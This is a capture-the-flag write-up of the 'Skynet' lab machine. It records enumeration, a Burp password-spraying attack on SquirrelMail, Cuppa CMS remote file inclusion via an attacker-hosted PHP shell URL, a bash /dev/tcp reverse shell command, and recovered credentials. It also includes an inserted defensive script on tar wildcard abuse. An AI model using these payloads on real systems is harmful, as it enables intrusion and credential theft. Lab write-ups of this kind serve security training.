SKYNET
Initial scanning
Nmap
These results were already very concerning.
Port | State | Service | Version |
---|---|---|---|
22/tcp | open | ssh | OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) |
80/tcp | open | http | Apache httpd 2.4.18 ((Ubuntu)) |
110/tcp | open | pop3 | Dovecot pop3d |
139/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
143/tcp | open | imap | Dovecot imapd |
445/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
Host: SKYNET
OS: Linux
CPE: cpe:/o:linux:linux_kernel
Findings
URLs
FFUF Findings
- ~~/admin (403)~~
- /squirrelmail
  - 1.4.23 (possibly vulnerable)
- ~~/ai (403)~~
- ~~/config (403)~~
- /45kra24zxs28v3yd
  - /45kra24zxs28v3yd/administrator (Cuppa CMS)
    - Has a login page. Default, known, and sprayed passwords do not work
  - /45kra24zxs28v3yd/administrator/default/index.html (same login page)
Creds
- milesdyson
  - Squirrelmail: cyborg007haloterminator
  - SMB: )s{A&2Z=F^n_E.B
- CUPPA Database
  - root:password123
  - admin:b686468aec2c71e1783375763dca9b7e
    - Could not crack with MD5 rockyou
Suspicious files
- /home/milesdyson
  - backups/backup.sh
    - Uses a tar wildcard, which is most likely vulnerable
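The page only notes that backup.sh archives with a tar wildcard, so the script below is an added example, not the box's own backup.sh: it shows the assumed vulnerable shape (`tar -cf archive *` after a `cd`) beside a hardened form that never lets the shell expand file names into tar's argument list, plus a pre-backup audit that flags entries whose names begin with `-`. The function names and the sample directory are constructed for the illustration.

```shell
#!/bin/sh
# Added example, not the backup.sh from the box. The page only states that the
# script uses a tar wildcard; the exact command in unsafe_backup is an ASSUMED shape.

# unsafe_backup SRC ARCHIVE: the assumed vulnerable pattern. The shell expands
# '*' into tar's argument list, so any entry in SRC whose name starts with '-'
# is parsed by tar as an option instead of as a file name.
unsafe_backup() {
    (cd "$1" && tar -cf "$2" *)
}

# safe_backup SRC ARCHIVE: no glob at all. tar changes into SRC itself and
# archives '.', so entry names never reach tar's option parser.
safe_backup() {
    tar -cf "$2" -C "$1" .
}

# audit_dash_names DIR: list top-level entries whose name starts with '-'.
# Run it before the backup, or periodically on directories a web server can
# write to, and alert on any output.
audit_dash_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# count_file_members ARCHIVE: number of non-directory entries in ARCHIVE,
# used to confirm nothing was silently dropped from the backup.
count_file_members() {
    tar -tf "$1" | grep -vc '/$'
}

# make_sample_dir: constructed input, a fake web root with one real file and
# one entry whose name a bare '*' would hand to tar as --exclude=secret.txt,
# quietly leaving secret.txt out of the backup.
make_sample_dir() {
    d=$(mktemp -d)
    echo 'db password' > "$d/secret.txt"
    : > "$d/--exclude=secret.txt"
    printf '%s\n' "$d"
}
```

With the sample directory, audit_dash_names reports the suspicious entry and safe_backup's archive still contains both files.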
POP3/IMAP
Appears to be plaintext; unable to authenticate.
SMB
ENUM4LINUX
Sharename | Type | Comment |
---|---|---|
print$ | Disk | Printer Drivers |
anonymous | Disk | Skynet Anonymous Share |
milesdyson | Disk | Miles Dyson Personal Share |
IPC$ | IPC | IPC Service (skynet server (Samba, Ubuntu)) |
#### Shares
##### Anonymous
Found a note saying passwords need to be changed. Also found log files containing possible passwords. Attempting to enumerate.
### Cuppa CMS
Found under skynet.thm/45kra24zxs28v3yd/administrator
It seems this is vulnerable to CVE-2022-25486.
I was able to exploit this using http://skynet.thm/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.77.246/phpshell.sh with the
##### milesdyson
Contained important.txt, which contained the URL for Cuppa CMS.
### Burp Suite Intruder attack
Using the list we found in the SMB anonymous share, we can enumerate SquirrelMail now. By using Intruder to send many requests with varying passwords from the list, we find milesdyson has not changed his SquirrelMail password.
### SquirrelMail
We were able to compromise this password using the Burp Suite password attack. Now we can see 3 messages in the inbox. One has the SMB password, which was tested and is still current. Another has random text. It seems to be a reference to this random post.
Post RCE
WWW-DATA
Everything in /var/www has already been found through other means.
Configuration.php is readable now and shows the DB password. Creating a persistent shell to try this.
bash -i >& /dev/tcp/10.13.77.246/5555 0>&1
Database has nothing of value besides the admin password hash.
b686468aec2c71e1783375763dca9b7e
Could not crack it with rockyou.
Updating this hash and manually logging in provides access to Cuppa, but no other meaningful info is contained within Cuppa.